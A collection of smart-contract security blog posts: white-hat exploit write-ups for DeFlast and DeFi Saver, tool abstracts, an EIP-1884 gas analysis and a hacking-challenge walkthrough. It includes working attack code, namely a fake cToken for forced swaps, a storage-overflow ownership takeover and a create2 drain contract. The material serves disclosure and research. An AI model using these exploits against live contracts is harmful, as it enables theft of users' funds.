“look Ma’, No Source!” Hacking a Defi Service With No Source Code Available

By the Dedaub team

This story describes a cool hack, for over $300K (even nearly $600K, if done at the right time). It is a white-hat hack. We performed it off-chain, demonstrated to Dinngo, the authors of the vulnerable service, and they reproduced it and applied it to rescue the funds of exposed accounts, securing them.

The hack is among the most instructive we have encountered, which is why we wanted to document it clearly. There’s something in it for everyone: it showcases the danger of token approvals, interesting financial manipulation, the use of different DeFi services (Aave, Compound, Uniswap) as part of the attack, and much more.

Furthermore, this is a rare, if not the first, case of hacking a fairly complex smart contract without any source code available. (At the time of implementing and confirming the attack, we had no idea who was the owner of the vulnerable contract, so we were going by available bytecode only.)

Let’s start from the high level, and we’ll get more and more technical, both in the finances and in the coding.

The End-User’s View

The hack affects two parties: the victim account (a wallet, not a contract) which holds the funds, and the enabler contract, which contains the vulnerable code. The vulnerability in the enabler allowed us to drain the victim’s funds, because the victim had approved the enabler for all of its cUSDC (about $580K). In fact, there were several victims, but in the rest we only discuss the one we targeted, having an exposure 100x higher than the next closest.

If you are a DeFi end-user and want to get just one useful thing out of this article, this is it: be very careful with token approvals from your accounts. You are giving the approved spender contract the ability to do anything with your tokens. A vulnerability in the contract can drain your account. As something actionable, check out the new (in beta) Etherscan token approval feature (here demonstrated on our victim account).

Here’s what the victim’s account approvals looked like at the time of the hack:

See the highlighted approval: a contract with no source code.

Notice something strange? We highlighted one of the approvals. Of 110 token approvals, 109 were done to contracts with source code, which anyone can inspect. And one approval is to 0x936de89…: our enabler. Our enabler is also a public service: DeFlast.finance, created by Dinngo.

But the lack of source code for the contract should give you pause. See how it sticks out in the list above!

To be clear, this is not how we found out about the victim and the enabler. Instead, we are regularly running automated analyses on the entire blockchain that warn us about contracts worth inspecting closely. But the above is a likely way in which a black-hat hacker would identify that something is fishy about our victim and that the attack vector involves the enabler: some funds have been trusted to code that will likely be checked by very few people.

So, if you have accounts that interact with DeFi protocols or other token services, do yourself a favor and inspect your approvals. Your hacker may not be white-hat.

Attack: High-Level View

The vulnerable contract (our enabler), decompiled by contract-library, has a bit of complexity. We will analyze it a little later, but, even if reverse engineering is not your cup of tea, the high-level description is interesting.

The contract’s executeOperation (called after an Aave flash loan, normally) takes as parameter a client account, two Compound cTokens, the flash loan balance, and some amounts. It then does the following:

  • mints new cToken up to the specified amount
  • liquidates (“redeems”) the client’s original cTokens (e.g., cUSDC) and transfers the underlying tokens to itself, the enabler
  • swaps the tokens from the previous step on Uniswap v1 into the token of the loan
  • repays the flash loan.

In the attack, the client is the victim account. But the code does not let anyone directly get the victim’s funds, it only forces a swap of the victim’s tokens from one kind of cToken into another.

So, how can this be exploited?

If you think about it in real-life terms, you already know the answer. You have someone forced to buy goods of your choice. How can you drain their funds?

By selling them worthless goods for a high price, of course!

Therefore, in order to attack, we did the following:

  • create our own ERC20 token
  • create a fake cToken (dummy methods, just returning the expected return codes) for this ERC20 token
  • create a Uniswap v1 exchange and liquidity pool for our ERC20 token, so that it can be traded
  • call the function, supply our parameters. The victim’s tokens (USDC) were transferred into our liquidity pool (after being converted to ETH), the victim got worthless tokens in exchange
  • exit the liquidity pool, get ETH.

A cute element of the attack is that we don’t even need a sizeable liquidity pool to begin with — we can exploit Uniswap’s constant-product price calculation. That is, we don’t just make the victim buy worthless tokens, we make them buy 99.99+% of the worthless tokens’ supply, in order to drive the price up so much that the victim needs to spend all their assets! The exact percentage was carefully calculated based on the victim’s cUSDC balance.

If you think this is complex, consider this: we had never created either a cToken or a Uniswap v1 liquidity pool in code before, yet it took us only half a day to implement the basic attack. The steps are certainly well within reach of a sophisticated hacker.

The reality got complicated by a few nasty details, such as outstanding loans, extra swaps to counter slippage, etc. But the heart of the attack is well-captured in this summary.

Attack: Technical View

The first (but not foremost) complication in this attack is that the enabler contract (DeFlast’s) has no source code available. However, contract-library.com offers a reasonably good decompilation of it. Starting from the public executeOperation function (typically the callback of an Aave flash loan) we can understand a lot of the code. Here are two key functions of the decompiled code, before any effort to manually improve:

function executeOperation(address _reserve, uint256 _amount, uint256 _fee, bytes _params) public nonPayable { 
    require(msg.data.length - 4 >= 128);
    require(_params <= 0x100000000);
    require(4 + _params + 32 <= 4 + (msg.data.length - 4));
    require(!((_params.length > 0x100000000) | (36 + _params + _params.length > 4 + (msg.data.length - 4))));
    v0 = new bytes[](_params.length);
    CALLDATACOPY(v0.data, 36 + _params, _params.length);
    MEM[v0.data + _params.length] = 0;
    v1 = 0x148f(_reserve, this);
    require(_amount <= v1, 'Invalid balance for the contract');
    require(v0.length >= 128);
    v2 = 0xdad(MEM[v0.data]);
    v3 = 0xdad(MEM[v0.data + 32]);
    0x13f6(MEM[v0.data + 96], _amount, MEM[v0.data + 32]);
    0xe5b(MEM[v0.data + 96], MEM[v0.data + 64], MEM[v0.data]);
    v4 = 0x10f2(this, v2);
    v5 = _SafeAdd(_fee, _amount);
    v6 = 0x11b5(v5, v4, v3, v2);
    v7 = 0x10f2(this, _reserve);
    v8 = _SafeAdd(_fee, _amount);
    require(v7 >= v8, 'Token balance not enough for repaying flashloan.');
    v9 = _SafeAdd(_fee, _amount);
    0x15b1(v9, _reserve);
}
...
function 0xe5b(uint256 varg0, uint256 varg1, uint256 varg2) private { 
    v0 = address(varg0);
    MEM[v1.data] = varg1;
    v2 = address(varg2);
    require(v2.code.size);
    v3, v4 = v2.transferFrom(v0, this).gas(msg.gas);
    require(v3); // checks call status, propagates error data on error
    require(RETURNDATASIZE() >= 32);
    require(1 == v4, 'Failed to transfer cToken from user when redeeming');
    v5 = address(varg2);
    v6 = v1.data;
    require(v5.code.size);
    v7, v8 = v5.approve(v5, varg1).gas(msg.gas);
    require(v7); // checks call status, propagates error data on error
    require(RETURNDATASIZE() >= 32);
    require(1 == v8, 'Failed to approve cToken to Token Contract when redeeming');
    v9 = address(varg2);
    require(v9.code.size);
    v10, v11 = v9.redeem(varg1).gas(msg.gas);
    require(v10); // checks call status, propagates error data on error
    require(RETURNDATASIZE() >= 32);
    require(!v11, 'Failed to redeem underlying token.');
    v12 = 0xdad(varg2);
    v13 = 0x10f2(this, v12);
    v14 = address(varg2);
    emit 0xaface4c9957b8058dd049dc2a148905af00a14f8ef10dc658a81d03f527ab906(v14, v13);
    return ;
}

After an afternoon of manual polishing, here’s the result of our reverse engineering for the same two functions:

// _reserve is the underlying token of ctoken1, or they both pretend it is
// ctoken0 has to be a true CToken: CUSDC
// numTokens is the amount of the victim's CTokens we want to/can get
function executeOperation(address _reserve, uint256 _amount, uint256 _fee, bytes _params) public nonPayable { 
    require(_params.length <= 256);
    require(_amount <= getBalance(_reserve, this), 'Invalid balance for the contract');
          // need to have a balance with token _reserve
    ctoken0 = _params[0]; // certain ctoken
    ctoken1 = _params[1];
    numTokens = _params[2];
    owner = _params[3];
    token0 = getUnderlyingForCToken(ctoken0);
    token1 = getUnderlyingForCToken(ctoken1);
    mintCTokenForOwner(owner, _amount, ctoken1);  // mint amount of ctoken and transfer to owner
    redeemCTokenReceiveUnderlying(owner, numTokens, ctoken0);
       // get owner's ctoken, redeem it, get underlying token in "this" contract
    v4 = getBalance(this, token0);
    amountPlusFee = _SafeAdd(_fee, _amount);
    v6 = swapTokens(amountPlusFee, v4, token1, token0);
       // swaps (on Uniswap v1) the tokens this contract got, to have enough to repay the loan
    v7 = getBalance(this, _reserve);
    v8 = _SafeAdd(_fee, _amount);
    require(v7 >= v8, 'Token balance not enough for repaying flashloan.');
    v9 = _SafeAdd(_fee, _amount);
    repayFlashLoan(v9, _reserve);
}

function redeemCTokenReceiveUnderlying(uint256 owner, uint256 numTokens, uint256 ctoken) private { 
    ok, v4 = ctoken.transferFrom(owner, this, numTokens).gas(msg.gas);
    require(1 == v4, 'Failed to transfer cToken from user when redeeming');
    v5 = ctoken;
    ok, v8 = ctoken.approve(v5, numTokens).gas(msg.gas);
    require(1 == v8, 'Failed to approve cToken to Token Contract when redeeming');
    ok, v11 = ctoken.redeem(numTokens).gas(msg.gas);
    require(!v11, 'Failed to redeem underlying token.');
    v12 = getUnderlyingForCToken(ctoken);
    v13 = getBalance(this, v12);
    emit 0xaface4c9957b8058dd049dc2a148905af00a14f8ef10dc658a81d03f527ab906(ctoken, v13);
    return ;
}

Keep in mind that, at the time of doing this, we had no idea what high-level service uses this contract — we had not linked it to DeFlast, nor even knew what DeFlast was. But the contract’s intent is not too hard to discern from the code: a user’s cTokens are swapped for different cTokens (specified in the signature) with the help of a flash loan. First, the flash loan funds allow minting the new cToken. Then, the old cTokens are redeemed. The proceeds of the redemption are swapped on Uniswap v1 to get enough underlying “old tokens” to repay the loan.

However, there is no safeguard to ensure that this code is indeed called after a flash loan. But even that alone would not have been safe: one could get a minuscule flash loan and call the contract with the desired parameters. More importantly, the code does not check that the flash loan “reserve” token is the same as the “underlying” of the new cToken, nor that what the user gets back is real cTokens (and not merely something pretending to be a cToken).

So, we have a forced swap in our hands. All we need to do is make sure the code doesn’t crash from underneath us. We can create our own worthless token, wrap it in a cToken, and we can build our own market for trading them. In fact, our cToken can be entirely fake: it just needs to return the right underlying token (our worthless token) and provide the expected return values: return 0 for mint and redeem, true for transfer and approve, etc.

pragma solidity ^0.7.0;

contract CMyToken {
    address private _underlying;
    constructor (address underlying) public {
        _underlying = underlying;
    }
    function underlying() public view returns (address) {
        return _underlying;
    }
    // funny how you think this matters
    function exchangeRateCurrent() public pure returns (uint256) {
        return 10 ** 18;
    }
    function mint(uint ) public pure returns (uint256) {
        return 0;  // means no error
    }
    function transfer(address, uint) public pure returns (bool) {
        return true; // whatever you say, boss
    }
    function transferFrom(address, address, uint256) public pure returns (bool) {
        return true; // at your command
    }
    function approve(address, uint256) public pure returns (bool) {
        return true;
    }   
    function redeem(uint) public pure returns (uint) {
        return 0;
    }
}

We then created an exchange for our token on Uniswap (v1, since that’s what the vulnerable code uses) and added a little bit of liquidity to it — about 0.001ETH against a tiny amount of our worthless token.

The beauty of Uniswap’s model is that it is so amazingly general, yet robust. It allows anyone to create an exchange and provide liquidity. Prices are determined entirely on-chain. However, the reliability of Uniswap prices depends on others jumping in and correcting exchange rate anomalies. Yet in our forced swap, there are no “others”! The market never gets a chance to adjust the price and restore our worthless token to its … worthlessness. (Even if a bot had been tempted to trade with us, we installed a trap in our worthless token, not allowing it to be traded outside the attack transaction.)

By instructing the enabler contract to trade the victim’s cTokens for our cTokens we can perform a successful attack. As mentioned earlier, we deliberately caused enormous slippage: our pool initially had just 0.001ETH against 0.0000001 of our worthless token. Still, we instructed the enabler to swap for over 99.9996% of the worthless token’s supply — the exact number being computed so that it would exhaust the victim’s funds.

A further complication is that the victim was using their cUSDC as collateral for Compound loans. The loan view of the account looked like this:

Victim had $580K in vulnerable assets, securing loans of about $280K.

The total value of outstanding loans at the moment of the attack was around $280K, with collateral at $580K. A direct attack cannot get the $300K difference but only about two-thirds of that, since the Compound Comptroller would not allow transferring out money that would violate the loan collateralization limits. But this is easy to address: we just take $280K in flash loans, repay the victim’s loans, drain the $580K and pay off the flash loans.

A final complication is that the Uniswap v1 pools are too shallow nowadays. The USDC pool has around $650K liquidity at the time of this writing. Since the vulnerable code forces a swap of the proceeds on Uniswap v1, we suffer tremendous slippage. A Uniswap v1 swap between USDC and our worthless token is really two swaps with ETH in the middle: first USDC to ETH, then ETH to our token. The first of these swaps, for $580K out of the $650K available, nets a lot less ETH than it should.

However, this is easily countered: once we exit our own liquidity pool, before the end of the transaction, we perform an inverse swap of ETH for USDC and exploit all the slippage we just caused. In the end, we are left with the right amount of the victim’s USDC.

Actual Rescue Operation

The above is the attack we performed locally last week (last of Jan. 2021), confirming the vulnerability. We then made an effort to locate the owner of the victim account, but a couple of messages (speculative, based on past activity) yielded nothing.

Only at that point did we search for the owners of the enabler contract and got a link to DeFlast.finance! This was a relief. Not only did we now have a contact that could authorize a white-hat attack, but the contact was a high-quality team —also behind other projects that we had recently inspected thoroughly.

We contacted Hsuan-Ting Chu, the CEO of Dinngo, since he was the most obvious point of contact for escalating the report of a critical vulnerability. Within a few hours we were in a meeting with Hsuan-Ting and Dinngo engineers where we presented the attack.

The Dinngo team took over the rescue operation, following the blueprint of our attack, and moved the victim’s positions to another wallet. Other victims were similarly moved in the past 48hours. The operation was done very smoothly and professionally, especially considering the complexity of the attack (check out the transaction for the main victim)!

Concluding

This was a cool hack. It started from a bad smell: code that didn’t seem to be checking that it’s used only in its intended scenarios. Despite not having source code, we followed a hunch and spent some time reverse engineering. The vulnerability then required financial manipulation. Creating an exchange. Exploiting slippage. Getting flash loans. Paying off Compound loans. Countering slippage.

All in a day’s work…

Ethereum Pawn Stars: “$5.7m in Hard Assets? Best I Can Do is $2.3m”

defi saver

Saving DeFi Saver with Static Contract Analysis

By the Dedaub team

A little after midnight on Jan.5, we contacted the DeFi Saver team with news of a critical vulnerability we discovered in one of their deployed smart contracts and that we had just managed to (offline-)exploit. They responded immediately and we got on a channel with several DeFi Saver people within 5 minutes. Less than 20 hours later, client funds have been migrated to safety via a white-hack exploit.

There were some interesting elements in this vulnerability.

  • It affected major clients of the service. We initially demonstrated by exploiting one client for $1.2M. Another client had $2.2M exploitable and several more had smaller positions. There were over 200 clients that had deposited money in the vulnerable service within the past two months so the overall exploit potential was possibly even higher at different times.
  • The vulnerability was originally flagged by a sophisticated static analysis, not by human inspection. This is rare. Automated analyses typically yield low-value warnings in monetary terms. We have submitted (back in Nov.) a technical paper on the analysis techniques.
  • Beyond the static analysis, the vulnerability requires significant combination of dynamic information and careful orchestration. To exploit, one needs to find clients that have still-outstanding approvals (granted to the vulnerable contract) and an active balance for the same ERC-20 token. Then one needs to retrieve the loans that the victim holds on Compound (on different currencies) and pay them off (via a flash loan or otherwise). At that point, all the victim’s funds in the ERC-20 token are available for transfer to the attacker.
    For instance, the prototype victim had $2M in assets that could be acquired by paying off a $735K loan. The even larger victim had $3.7M in assets and a $1.5M outstanding loan.
  • Salvaging the users’ funds was highly elegant, by using precisely the flash loan and proxy authorization functionality of DeFi Saver.

Next we give some more technical detail on the above. For the service-level picture, there is a writeup by the DeFi Saver team.

Static Analysis | The Vulnerability

The vulnerable code could be found in two different DeFi Saver contracts. You can see the vulnerable function from one of the contracts in the snippet below:

defi saver
Vulnerable code, one instance

This is helper functionality — a small, deeply-buried cog in a much larger machine. The comments reveal the intent. This is a function that gets called upon receiving an Aave flash loan, repays a Compound loan on behalf of a user, lets a caller-defined proxy execute arbitrary code, and then repays the flash loan with the money received from the proxy. However, all of this is irrelevant. “Ignore comments, debug only code” as the saying goes for the security-sensitive. And this code allows a lot more than the comments say.

Static Analysis | Automated Analysis and Finding the Vulnerability

Our main job is developing program analysis technology (including contract-library.com and the decompiler behind it). In the past half year we have started deploying a new analysis architecture that combines static analysis and symbolic execution. (We call it “symbolic value-flow analysis” and we will soon have full technical papers about it.) We found the DeFi Saver vulnerability while testing a new client for this analysis: a precise detector of “unrestricted transferFrom proxy” functionality.

Basically, when our analysis looked at the above code, it only saw it like this:

defi saver
Analysis view of the vulnerable functionality. We can control all parameters of the transferFrom but the last

All the red-highlighted elements are completely caller-controllable. There are few to no restrictions on what _reservecBorrowTokenuserproxy, etc. can be. Basically, our analysis did not see this piece of code as an “Aave callback after a flash-loan operation” but as a general-purpose lever for doing transferFrom calls on behalf of any contract unfortunate enough to have authorized the vulnerable contract.

Small tangent: You may say, this doesn’t look like it needs a very sophisticated analysis. It is pretty clear that the caller can set all these variables and they end up in sensitive positions in the transferFrom call. Indeed, even a naive static analysis would flag this instance. What made our symbolic-value flow analysis useful was not that it captured this instance but that it avoided warning about others that were not vulnerable. The analysis gave us just 27 warnings about such vulnerabilities out of the 40 thousand most-recently deployed contracts! This is an incredibly precise analysis and most of these warnings were correct (although typically no tokens were at risk).

Back to the vulnerability: Finding a transferFrom statically does not imply an exploitable vulnerability. (If it did, we would have tens more vulnerabilities in our hands — the analysis issued 27 reports, as we mentioned, and most were correct.) Indeed, to perform the transferFrom there are three more dynamic requirements, based on the current state of the contracts. First, the vulnerable contract needs to have a current allowance to transfer the tokens of a victim. Second, the victim needs to have tokens. As it turns out, users of the DeFi Saver service were in exactly that state relative to the vulnerable contract. Our prototype victim shows both a balance and an allowance for the vulnerable contract:

defi saver

The victim has (at the moment of the snapshot) some $2M in underlying assets (in the cWBTC coin). So, since we can do an uncontrolled transferFrom we can get all of that, right? Well, not quite. The transferFrom on a Compound CToken goes through the Compound Comptroller service, which checks the outstanding loans over the underlying assets. If the transferFrom would make the account liquidity negative, it is not allowed. Our prototype victim indeed has outstanding Compound loans — this is in fact the reason they are in this state of balances and allowances.

defi saver
Etherscan Loans view of one of the vulnerable clients. $735K of oustanding loans, $2M in collateral.

The victim has $2M in assets and $735K in outstanding loans. So, could we just ask for less money and do the transferFrom? Actually, no. If you check the vulnerable code from before, the last parameter, cTokenBalance, of the transferFrom is not caller-controllable! It is instead the full balance of the victim.

This brings us to the third dynamic requirement for exploiting the vulnerability. In order to call this transferFrom and get the victim’s assets, we first need to pay off their loans!

This exploit is precisely what we demonstrated to the DeFi Saver team upon disclosing the vulnerability.

The Salvage Operation

Our prototype exploit ran on a private fork of the blockchain. For the real salvaging operation, we collaborated with the DeFi Saver team. Once we discussed the plan, they took the lead in the implementation.

The salvage operation was a thing of beauty, if we may say so. The DeFi Saver team performed it very professionally, with simpler code than our original exploit. The very same vulnerable functionality (the “cog”) was used after a flash loan in order to empty the victims’ accounts and transfer the vulnerable funds to new accounts that were then assigned to the original owner.
[Relevant transactions for the two victims with the largest holdings here and here.]

defi saver

Part of the elegance of the solution was that, in the end, the owners of the victim contracts held exactly the same positions as before, only now in two contracts instead of one. They had as much in underlying assets as before, and exactly as much in outstanding loans as before.

Wrapping Up

This was a very interesting vulnerability to us, although the root cause was simple (insufficient protection against hostile callers). It has many of the elements that we think are going to be central in future vulnerability detection work:

  • Combinations of static and dynamic analysis to find the vulnerable instance. Human eyes cannot be inspecting all code in great depth, even when the stakes are so high. A mundane piece of functionality can be security-critical. Static analysis is essential. Yet it’s not enough. The results will have to be cross-referenced with the current dynamic state to see if the contract is actually used in a vulnerable manner.
  • Future vulnerabilities may often follow the pattern of using existing pieces of code in unexpected ways. The more this happens, the more exploit generation will need to take current state into account. In this case, to exploit a contract, the attacker needs to pay off the contract’s loans. In the DeFi space, understanding of such state constraints will be crucial for future security work.

PS. If we might have saved you funds and/or you want to show support for our security efforts, we’ll be happy to receive donations at 0xACcE1553C83185a293e8B4865307aF8309af9407 .

Ethainter: A Smart Contract Security Analyzer for Composite Vulnerabilities

Smart contracts on permissionless blockchains are exposedto inherent security risks due to interactions with untrusted entities. Static analyzers are essential for identifying security risks and avoiding millions of dollars worth of damage.
We introduce Ethainter, a security analyzer checking information flow with data sanitization in smart contracts. Ethainter identifies composite attacks that involve an escalation of tainted information, through multiple transactions, leading to severe violations. The analysis scales to the entire blockchain, consisting of hundreds of thousands of unique smart contracts, deployed over millions of accounts. Ethainter is more precise than previous approaches, as we confirm by automatic exploit generation (e.g., destroying over 800 contracts on the Ropsten network) and by manual inspection, showing a very high precision of 82.5% valid warnings for end-to-end vulnerabilities. Ethainter’s balance of precision and completeness offers significant advantages over other tools such as Securify, Securify2, and teEther.

Read more

Rising Gas Prices Are Threatening Our Security (No, It’s Not the Saudi Attack)

Mr. Out of gas exception

EIP 1884 is set to be implemented into the upcoming Ethereum ‘Istanbul’ hard fork. It:

  • increases the cost of opcode SLOAD from 200 to 800 gas
  • increases the cost of BALANCE and EXTCODEHASH from 400 to 700 gas
  • adds a new opcode SELFBALANCE with cost 5.

Due to a fixed gas limit (2300) imposed by the .send(..) and .transfer(..) Solidity functions, fallback functions that use these opcodes may now start to fail due to an out-of-gas exception.

Analysis by Contract-library.com team

Contract-library.com, an automated security service, performs sophisticated static analysis on all deployed smart contracts (over 20 million of them). As static analysis is a technique that takes into account all (or almost all) possible program executions, it is expected to return the most comprehensive list of smart contracts affected by security vulnerabilities.

On Friday August 16th Martin Holst Swende of the Ethereum foundation asked a question on the ETHSecurity channel on telegram about how to go about finding smart contracts whose fallback function may fail due to EIP-1884. Since contract-library.com already had gas consumption analysis built into its core static analyses, we reached out on the same day with a list of contracts (continuously updated) that may be affected.

Over the subsequent days, also with the input of Martin Holst Swende, the gas cost analysis computation was updated and improved, over several iterations. The analysis currently reveals over 800 contracts that are highly likely to fail if called with 2300 gas (whereas they would succeed prior to EIP-1884). A subsequent, more general, analysis was also developed. This would be the most comprehensive list of possibly affected smart contracts for this particular issue, but also contains many false positives. This more general “may” analysis reveals that 7000 currently deployed smart contracts may fail under some execution paths with 2300 gas.

In addition, since our analysis is fully automated, we have also performed experiments to see whether these issues can be simply avoided by repricing the LOG0, LOG1 ... opcodes. Note that these opcodes tend to occur quite often in fallback functions. By halving the Glog and Glogtopic gas costs (refer to the yellow paper), the number of flagged contracts is reduced by approximately half!

Although repricing opcodes can always break contracts, the EVM should be able to evolve too. Clearly, a decent number of contracts will be broken due to this change, so care must be taken to lessen the impact on the overall ecosystem. In this case, we recommend repricing the LOGx opcodes, which seem to be mispriced anyway. This way, there will be fewer contracts affected.

A more interesting, but perhaps equally serious side-effect of EIP-1884 and EIP-2200 combined is that it lowers the cost of performing an unbounded mass iteration attack, which is currently quite high. This attack is described in MadMax. In summary, this is an attack carried out by an unauthorized user, to increase the size of an array or data structure, which is iterated upon by any other user, rendering the functionality inaccessible by increasing gas cost beyond the block gas limit. The combined effect of EIP-1884 and EIP-2200 make this kind of attack around 7 times cheaper on average, rendering it much more feasible. This attack requires 2 SSTOREs per array element that is added by the attacker. This array is then iterated upon by the victim, requiring an additional SLOAD. For a list of contracts that may be susceptible to unbounded iteration, we have you covered. The list contains approximately 15k contracts.

Which contracts will be affected? What about the one I’m currently developing?

If your contract does not have fallbacks which may fail with 2300 gas) or is not susceptible to unbounded iteration, then you’re most probably fine. If it is, you may still be ok, but further investigation is necessary. If you would like to see whether the contract you are developing may be affected, deploy it to one of the Ethereum testnets and check your results at contract-library.com.

Below are sample contracts with a non-zero Ether balance that are affected by the repricing of SLOAD operations, so that their fallback is no longer runnable under the send/transfer gas allowance of 2300.

KyberNetwork

function() public payable {
        require(reserveType[msg.sender] != ReserveType.NONE);
        EtherReceival(msg.sender, msg.value);
    }

NEXXO crowdsale :

modifier onlyICO() {
        require(now >= icoStartDate && now < icoEndDate, "CrowdSale is not running");
        _;
    }
    function () public payable onlyICO{
        require(!stopped, "CrowdSale is stopping");
    }

For NEXXO, it checks three slots, icoStartDateicoEndDate and stopped, totalling 2400 with new gas rules.

Crowd Machine Compute Token crowdsale:

modifier onlyIfRunning
  {
    require(running);
    _;
  }
  function () public onlyIfRunning payable {
    require(isApproved(msg.sender));
    LogEthReceived(msg.sender, msg.value);
  }

Important reminder: The crowdsales above do not inherently break, it just means that callers need to add some more gas than 2300 to partake in the ICO contracts.

CappedVault

  • Fallback function:
function () public payable {
        require(total() + msg.value <= limit);
    }

Unknown Harvester with 5 ETH

require((msg.value >= stor___function_selector__));
  emit 0xafd096c64445a293507447c2ecb78f03b4f5459ec28b8e9bfe113c35b75d624a(address(msg.sender), msg.value, 0x447);
  exit();

No source code available. Note that this contract would work if LOGx gas cost is reduced.

Aragon’s DepositableDelegateProxy

function isDepositable() public view returns (bool) {
        return DEPOSITABLE_POSITION.getStorageBool();
    }
    event ProxyDeposit(address sender, uint256 value);
    function () external payable {
        // send / transfer
        if (gasleft() < FWD_GAS_LIMIT) {
            require(msg.value > 0 && msg.data.length == 0);
            require(isDepositable());
            emit ProxyDeposit(msg.sender, msg.value);
        } else { // all calls except for send or transfer
            address target = implementation();
            delegatedFwd(target, msg.data);
        }
    }
}

Note that this contract would work if LOGx gas cost is reduced. According to the contract-library analysis, the fallback function may fail due to anything between 2308 and 2438 gas. Issue at Aragon

How does the static analysis on contract-library.com work?

Static program analysis is a technique that considers all of a program’s behaviors without having to execute the program. Static analysis is generally thought to be expensive, but over the years we have developed techniques to counter this. Firstly, we developed new techniques in the area of “declarative program analysis”, which simplifies analysis implementations. Secondly, we have applied our analyses at scale, which makes them worth the effort. Contract-library’s internal analysis framework decompiles all smart contracts on the main Ethereum network and most popular testnets to an IR representation, amenable to analysis. The decompilation framework is described in a 2019 research paper. Following this analysis, many “client analyses”, are applied. These analyses all benefit from a rich suite of analysis primitives, such as gas cost analysis (similar to worst-case execution analysis), memory contents analysis, etc. These are instantiated and customized in each client analysis. Finally, we encode all our analyses, decompilers, etc. in a declarative language, and automatically synthesize a fast C++ implementation using Soufflé.

For illustration, the FALLBACK_WILL_FAIL static analysis is encoded in the following simplified datalog spec, deployed on contract-library.com:

% Restrict the edges that form the possible paths to those in fallback functions
FallbackFunctionBlockEdge(from, to) :-
   GlobalBlockEdge(from, to), 
   InFunction(from, f), FallbackFunction(f),
   InFunction(to, g), FallbackFunction(g).
% Analyze the fallback function paths with the
% conventional gas semantics, taking shortest paths
GasCostAnalysis = new CostAnalysis(
  Block_Gas, FallbackFunctionBlockEdge, 2300, min
).
% Analyze the fallback function paths with the
% updated gas semantics, taking shortest paths
EIP1884GasCostAnalysis = new CostAnalysis(
  EIP1884Block_Gas, FallbackFunctionBlockEdge, 2300, min
).
FallbackWillFailAnyway(n - 2300) :-
   GasCostAnalysis(*, n), n > 2300.
% fallback will fail with n - m additional gas
EIP1884FallbackWillFail(n - m) :-
   EIP1884GasCostAnalysis(block, n), n > 2300,
   GasCostAnalysis(block, m),
   !FallbackWillFailAnyway(*).

The analysis performs a gas cost computation over all possible paths in the fallback functions, using the gas cost semantics of both PRE and POST EIP-1884. In cases where there is a path that can complete in the former semantics but not the latter, we flag the smart contract.

Gigahorse: Thorough, Declarative Decompilation of Smart Contracts

The rise of smart contract—autonomous applications running on blockchains—has led to a growing number of threats, necessitating sophisticated program analysis. However, smart contracts, which transact valuable tokens and cryptocurrencies, are compiled to very low-level bytecode. This bytecode is the ultimate semantics and means of enforcement of the contract.

We present the Gigahorse toolchain. At its core is a reverse compiler (i.e., a decompiler) that decompiles smart contracts from Ethereum Virtual Machine (EVM) bytecode into a high- level 3-address code representation.

Read more

Chronicle of an Attack Foretold

Co-written with 

Neville Grech

In a few hours, an attacker will claim the prize for the first Consensys Diligence Ethereum hacking challenge. Here’s how they’ll do it, why nobody else can perform the same attack (any longer), and why the attacker has to wait…

The challenge consisted of a smart contract submitted to the mainnet, without sources. The contract is meant to be decoded, attacked, and drained of its minimal funds. The draining account will then get an off-contract bounty.

At this point in time, an attacker has not just entered the house but also locked the door behind them, so nobody else can enter. (Which is also why we stopped looking into the challenge and are are instead writing this text.) But, interestingly, the attacker has to wait until the Constantinople rollout enables the CREATE2 opcode, for the second step of the attack to take place!

To understand the challenge, let’s look at a decompiled version of the contract. We are using our favorite decompiler — our own service, contract-library.com, applied on the challenge contract.

As it turns out, the challenge requires solving two sub-problems: first, gaining ownership of the contract, in order to enable a delegatecallto a contract that the attacker controls, and, second, circumventing checks over the bytecode of the contract getting delegatecall-ed: the contract cannot contain instructions createcallcallcodedelegatecallstaticcallselfdestruct. Let’s look at both sub-problems in detail, and see how they are solved.

Challenge Problem 1

In the decompiled code, one can notice that there are two arrays, with guessed names array_0 and owners. The latter is used to check whether the caller has the required privileges to perform the final part of the attack. Although there are no setters for owners, one can still pollute the data stored in it, as all arrays are stored in the same address space. The length of the first array in the deployed contract was set to maxint: a size that allows overflow, so that an attacker can write anywhere in storage.

Per standard convention for (dynamic) storage arrays, their lengths are stored in storage locations 0 and 1, while their contents are stored at storage locations keccak256(0) and keccak256(1), respectively. One can therefore compute the offset of the contents of owners and of the length of owners (as well as that of array_0) relative to the start of the contents of array_0, as can be seen in the following “attacker’s” code:

function offsets() private returns (uint, uint, uint) {
  uint array0start = uint(keccak256(abi.encodePacked(uint(0))));
  uint array1start = uint(keccak256(abi.encodePacked(uint(1))));
  uint contentOffset  = array1start - array0start;
  uint lengthOffset = uint(-array0start);
  return (contentOffset, lengthOffset, lengthOffset + 1);
}

Since the challenge contract allows overflow of the array_0 contents area, these offsets let us write into owners, and also change the length of owners. In fact, the attacker did not stop there! They also set the length of array_0 to 0, so that no future attacker can employ the same overflow.

function attack() public {
  address attackerAddress = address(...);
  address victim = address(0x68Cb...);
  (uint contentOffset, uint lengthOffset0, uint lengthOffset1) 
      = offsets();
  bool success;
  bytes memory result;
  // set address I control as one of the owners
  victim.call(abi.encodeWithSelector(
      bytes4(0x4214352d), uint(attackerAddress), contentOffset)
  );
  
  // set length of array 0 to 0 (no more out of bounds)
  victim.call(abi.encodeWithSelector(
      bytes4(0x4214352d), uint(0), lengthOffset0)
  );
  
  // set length of array 1 to 1 (make attacker the only owner)
  victim.call(abi.encodeWithSelector(
      bytes4(0x4214352d), uint(1), lengthOffset1)
  );  
}

The contract registered as owner (attackerAddress) can be any that the attacker controls. Now the attacker has both entered and secured the door! But the more serious challenge is still up ahead.

Challenge Problem 2

The second part of the challenge is the actual draining of the contract’s funds. This involves creating yet another attacker contract that will simply drain the contract’s balance. If one checks function 0x2918435f of the challenge contract, the code calls delegatecall on an attacker-supplied address parameter, effectively handing it full control of the account. There is a small twist to this plot however. The delegatecall is preceded by checks of all the bytecodes of the called contract, to ensure that they never match values 0xf0, 0xf1, 0xf2, 0xf4, 0xfa, or 0xff. This precludes use of instructions createcallcallcodedelegatecallstaticcall, and selfdestruct.

Currently (Feb. 27), these are the only instructions that can be used to drain a contract from its funds. In a few hours, however, a new bytecode instruction (create2) will be available and it can also move funds! Hence the attacker now only needs to pass the address to a smart contract implementing something similar to this:

contract BountyClaimer {    
    function() external {
        uint res;
        assembly {
            let res := create2(balance(address), 0, 1, 0)
        }
    }
}

A minor challenge is that byte value 0xff arises commonly in Solidity compilation, so the attacker has to use roundabout ways to compute some values, but this is little more than a nuisance.

We would like to salute the clever attacker that will be executing this attack within the next few hours.

